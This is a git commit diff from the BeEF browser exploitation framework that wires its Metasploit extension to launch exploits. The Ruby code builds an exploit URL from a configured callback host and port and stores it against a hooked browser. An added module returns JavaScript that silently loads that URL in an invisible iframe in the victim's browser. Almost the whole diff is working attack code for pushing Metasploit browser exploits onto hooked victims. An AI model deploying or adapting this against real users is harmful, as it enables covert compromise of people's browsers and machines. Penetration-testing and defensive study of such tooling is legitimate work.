update of msf module to make it launch exploits

git-svn-id: https://beef.googlecode.com/svn/trunk@1359 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
2011-10-10 01:52:55 +00:00
parent ab1ec19a5c
commit 17d8553b9f
3 changed files with 46 additions and 0 deletions
--- a/extensions/metasploit/api.rb
+++ b/extensions/metasploit/api.rb
@@ -125,6 +125,31 @@ module API
            # This call has not been tested
            msf.call('module.execute', 'exploit', msf_key, msf_opts)
        end
+
+        hb = BeEF::HBManager.get_by_session(hbsession)
+        if not hb
+            print_error "Could not find hooked browser when attempting to execute module '#{mod}'"
+            return false
+        end
+
+        bopts = []
+	uri = ""
+	if msf_opts['SSL']
+		uri += "https://"
+	else
+		uri += "http://"
+	end
+	config = BeEF::Core::Configuration.instance.get('beef.extension.metasploit')
+        uri += config['callback_host'] + ":" + msf_opts['SRVPORT'] + "/" + msf_opts['URIPATH']
+
+
+	bopts <<   { :sploit_url => uri } 
+        c = BeEF::Core::Models::Command.new(:data => bopts.to_json,
+            :hooked_browser_id => hb.id,
+            :command_module_id => BeEF::Core::Configuration.instance.get("beef.module.#{mod}.db.id"),
+            :creationdate => Time.new.to_i
+          ).save
+
        # Still need to create command object to store a string saying "Exploit launched @ [time]", to ensure BeEF can keep track of
        # which exploits where executed against which hooked browsers
        return true
--- a/extensions/metasploit/extension.rb
+++ b/extensions/metasploit/extension.rb
@@ -97,3 +97,4 @@ end

 require 'extensions/metasploit/rpcclient'
 require 'extensions/metasploit/api'
+require 'extensions/metasploit/module'
--- a/extensions/metasploit/module.rb
+++ b/extensions/metasploit/module.rb
@@ -16,5 +16,25 @@

 # This is a dummy module to fool BeEF's loading system
 class Msf_module < BeEF::Core::Command
+        def output
+
+	command = BeEF::Core::Models::Command.first(:id => @command_id)
+	data = JSON.parse(command['data'])
+	sploit_url =  data[0]['sploit_url']
+
+      return "  
+beef.execute(function() {
+        var result; 
+
+        try { 
+                var sploit = beef.dom.createInvisibleIframe();
+                sploit.src = '#{sploit_url}';
+        } catch(e) { 
+                for(var n in e) 
+                        result+= n + ' '  + e[n] ; 
+        } 
+
+});"
+        end

 end